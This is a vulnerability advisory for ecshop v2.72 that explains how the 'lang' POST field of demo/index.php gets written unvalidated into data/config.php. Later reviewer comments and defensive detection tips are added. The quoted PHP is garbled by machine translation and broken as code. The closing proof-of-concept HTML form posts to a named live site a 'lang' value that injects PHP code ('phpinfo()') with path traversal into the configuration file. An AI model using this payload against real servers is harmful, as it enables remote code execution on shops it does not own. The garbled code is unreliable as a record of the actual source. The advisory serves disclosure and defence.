//-------------------------------------------------------------
Release date: 2010-11-26
Author: xhming
Affected Version: ecshop v2.72
Official Address: http://www.ecshop.cn/
Vulnerability Type: Code Execution
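Vulnerability description: demo/index.php takes the POST parameter lang, splits it on underscores, and passes the pieces without validation both into an include_once path and into write_charset_config(), which writes them into data/config.php. Request-supplied text therefore ends up inside a PHP file that the application loads.
Vulnerability Analysis: demo/index.php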
/* NOTE(review): this excerpt appears to have passed through machine translation:
   string quotes are missing and keywords/variables are re-capitalised. Read it as
   a sketch of the PHP in demo/index.php, not as runnable code. */
/* Source of the issue: the lang POST field is taken straight from the request. */
{If (! Empty ($ _ POST [lang])
/* Split the submitted value with explode(); the delimiter is printed as a bare
   underscore (presumably the string '_' before the quotes were lost). */
{$ Lang_charset = explode (_, $ _ POST [lang]);
/* Pieces 0 and 1 are rejoined with an underscore into $updater_lang ... */
$ Updater_lang = $ lang_charset [0]. _. $ lang_charset [1];
/* ... and piece 2 becomes $ec_charset. No allow-list or character check on any
   piece is visible in this excerpt. */
$ Ec_charset = $ lang_charset [2];}
........................................
/* Build a file path from ROOT_PATH plus both request-derived values.
   NOTE(review): the directory is printed as "demo/ages/", which may have been
   truncated by the translation; confirm against the shipped file. */
$ Updater_lang_package_path = ROOT_PATH. demo/ages/. $ updater_lang. _. $ ec_charset.. php;
/* The path is include_once'd when it exists. Both variable parts come from the
   lang field, so the request influences which file is included; comparing them
   against a fixed list of shipped language packs would be the usual guard. */
If (file_exists ($ updater_lang_package_path ))
{Include_once ($ updater_lang_package_path );
/* $_LANG is handed to the template; presumably the included file populates it. */
$ Smarty-> assign (lang, $ _ LANG );}
Else
/* Abort when no file exists at the computed path. */
{Die (Can find language package !); }/* Initialize the process control variable */
/* step is read from $_REQUEST (so GET or POST can set it); sel_lang is the
   default when it is absent. */
$ Step = isset ($ _ REQUEST [step])? $ _ REQUEST [step]: sel_lang;
/* Both request-derived values are also exposed to the template. */
$ Smarty-> assign (ec_charset, $ ec_charset );
$ Smarty-> assign (updater_lang, $ updater_lang );
Switch ($ step)
/* The readme step forwards both values, still unvalidated as far as this
   excerpt shows, to write_charset_config(). */
{Case readme: write_charset_config ($ updater_lang, $ ec_charset );
.......................................
/* Rewrites data/config.php so that its EC_LANGUAGE and EC_CHARSET define()
   lines carry the given $lang and $charset, and returns the result of
   file_put_contents(). The excerpt ends before the function's closing brace.
   insertconfig() is not shown; presumably a regex find-and-replace helper. */
Function write_charset_config ($ lang, $ charset)
{$ Config_file = ROOT_PATH. data/config. php;
/* Load the current configuration file as one string. */
$ S = file_get_contents ($ config_file );
/* NOTE(review): looks like the closing PHP tag is removed here and re-appended
   after the two define() rewrites; confirm against insertconfig(). */
$ S = insertconfig ($ s, "/?> /","");
/* $lang is concatenated into the replacement text as-is. The target is a PHP
   source file, so any quote or statement characters in $lang become part of
   that file's code. Restricting $lang to a known set of language names, or at
   least to letters, digits and underscores, before this call closes that path. */
$ S = insertconfig ($ s, "/define (EC_LANGUAGE, s *.*?); /I "," define (EC_LANGUAGE, ". $ lang .");");
/* Same pattern and same concern for $charset. */
$ S = insertconfig ($ s, "/define (EC_CHARSET, s *.*?); /I "," define (EC_CHARSET, ". $ charset .");");
$ S = insertconfig ($ s, "/?> /","?> ");
/* Persist the modified text back to data/config.php. */
Return file_put_contents ($ config_file, $ s );
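Precondition for exploitation: demo/index.php must still be present and reachable on the server, so an installation whose demo/ directory has been removed is not exposed through this path.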
EXP:
<!-- Published proof-of-concept form, kept as printed. It POSTs two fields to
     demo/index.php: lang, the value that the analysis shows being written into
     data/config.php, and step=readme, which selects the branch that calls
     write_charset_config().
     For defenders: POST requests to demo/index.php with step=readme and a lang
     value containing anything other than letters, digits and underscores are
     worth investigating in web-server or WAF logs, as is any unexpected change
     to data/config.php. Going by the explode() on underscore in the analysis,
     legitimate values presumably look like three underscore-separated tokens. -->
<Title> ecshop v2.72 front-end shell Write vulnerability by: xhm1large </title>
<Form method = "post" name = "register" action = http://www.4safer.com/demo/index.php>
<H3> ecshop v2.72 front-end shell Write Vulnerability <Input type = "text" name = "lang" size = "80" value = "); phpinfo (); (_ 1 _/.. /.. /.. /index "/>
<Input type = "hidden" name = "step" value = "readme"/>
<Button class = "submit" type = "submit" name = "regsubmit" value = "true"> submit </button>
</Form>